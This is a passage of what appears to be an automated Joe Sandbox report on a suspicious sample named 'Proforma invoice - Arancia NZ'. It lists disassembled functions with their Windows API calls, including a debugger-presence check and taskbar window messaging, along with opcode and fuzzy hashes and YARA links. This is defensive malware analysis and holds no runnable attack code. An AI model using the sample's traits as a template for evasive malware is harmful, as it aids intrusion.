                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ClassName_wcscmp
                                                                                                                    • String ID: #32770
                                                                                                                    • API String ID: 2292705959-463685578
                                                                                                                    • Opcode ID: cf32d509c9738f8f764db7f6ccbaec530213e6d02463fed9c071c93d9c11cf14
                                                                                                                    • Instruction ID: bae78f4d98c0da86a9b09a71d68b0d8ec060a7c99022dc6b9296e4fbfaac8730
                                                                                                                    • Opcode Fuzzy Hash: cf32d509c9738f8f764db7f6ccbaec530213e6d02463fed9c071c93d9c11cf14
                                                                                                                    • Instruction Fuzzy Hash: 7AE09232A012292AE720AB99AC4AAE7FBACEB45B70F000067FD44D3051D9709A558BE4
                                                                                                                    Function 0028B2C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0028B314: _memset.LIBCMT ref: 0028B321
                                                                                                                      • Part of subcall function 00270940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,0028B2F0,?,?,?,0025100A), ref: 00270945
                                                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,0025100A), ref: 0028B2F4
                                                                                                                    • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0025100A), ref: 0028B303
                                                                                                                    Strings
                                                                                                                    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0028B2FE
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                                                                                    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                    • API String ID: 3158253471-631824599
                                                                                                                    • Opcode ID: 9d9f8e04b29f44f3b5c4258f75c11be03198124af0947c98398f30627da704c4
                                                                                                                    • Instruction ID: 75ba5c8e54d49d44f7c601f5c53e7ce04239e805ddd631f8729585987e5267e9
                                                                                                                    • Opcode Fuzzy Hash: 9d9f8e04b29f44f3b5c4258f75c11be03198124af0947c98398f30627da704c4
                                                                                                                    • Instruction Fuzzy Hash: 85E06574521711CBD761AF24E90875277E4AF04744F00897DE846C7290E7B4E418CB61
                                                                                                                    Function 00291935 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetSystemDirectoryW.KERNEL32(?), ref: 00291775
                                                                                                                      • Part of subcall function 002CBFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,0029195E,?), ref: 002CBFFE
                                                                                                                      • Part of subcall function 002CBFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 002CC010
                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0029196D
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                                                                                                    • String ID: WIN_XPe
                                                                                                                    • API String ID: 582185067-3257408948
                                                                                                                    • Opcode ID: 49441cfdf11da4a54c6bd9120a7aa8c3e0a7a2ad348bb1bd3134aa6c509deeaa
                                                                                                                    • Instruction ID: 79f09259671a1ee083d751b4ff1814e4c1ef516e4ec15d33c6ff80c8b23964c8
                                                                                                                    • Opcode Fuzzy Hash: 49441cfdf11da4a54c6bd9120a7aa8c3e0a7a2ad348bb1bd3134aa6c509deeaa
                                                                                                                    • Instruction Fuzzy Hash: 3BF0C97082110BDFDF55DF92DA89AECBBF8AF08301F64009AE112A2190D7718FA4DF64
                                                                                                                    Function 002D5964 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 002D596E
                                                                                                                    • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 002D5981
                                                                                                                      • Part of subcall function 002B5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 002B52BC
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FindMessagePostSleepWindow
                                                                                                                    • String ID: Shell_TrayWnd
                                                                                                                    • API String ID: 529655941-2988720461
                                                                                                                    • Opcode ID: c9a6ce89812e09f4b4b0bd27c153f19753671b43d7293b711c156f9efb01ce5b
                                                                                                                    • Instruction ID: 639aed9db3a6227d9b33e23218db2e224b412228fc22ee0a319f6d72ac0ac037
                                                                                                                    • Opcode Fuzzy Hash: c9a6ce89812e09f4b4b0bd27c153f19753671b43d7293b711c156f9efb01ce5b
                                                                                                                    • Instruction Fuzzy Hash: 29D0C73579531176D6A47770AD5FFD66614AB00750F040425B7569A1D0D9E09800C658
                                                                                                                    Function 002D5998 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 002D59AE
                                                                                                                    • PostMessageW.USER32(00000000), ref: 002D59B5
                                                                                                                      • Part of subcall function 002B5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 002B52BC
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FindMessagePostSleepWindow
                                                                                                                    • String ID: Shell_TrayWnd
                                                                                                                    • API String ID: 529655941-2988720461
                                                                                                                    • Opcode ID: d2c6cdfebd8f426df9e3f13224ef7800a980914176b171e4a8c3ee2aadb4c53f
                                                                                                                    • Instruction ID: 5bcc2eabcd82cf830f0a0bfdf1ff06c224e542dfb899e4e363f1985510816798
                                                                                                                    • Opcode Fuzzy Hash: d2c6cdfebd8f426df9e3f13224ef7800a980914176b171e4a8c3ee2aadb4c53f
                                                                                                                    • Instruction Fuzzy Hash: 55D0C9317823117AEAA8BB70AD5FFD66614AB05B50F080826B756AA1D0D9E0A800CA98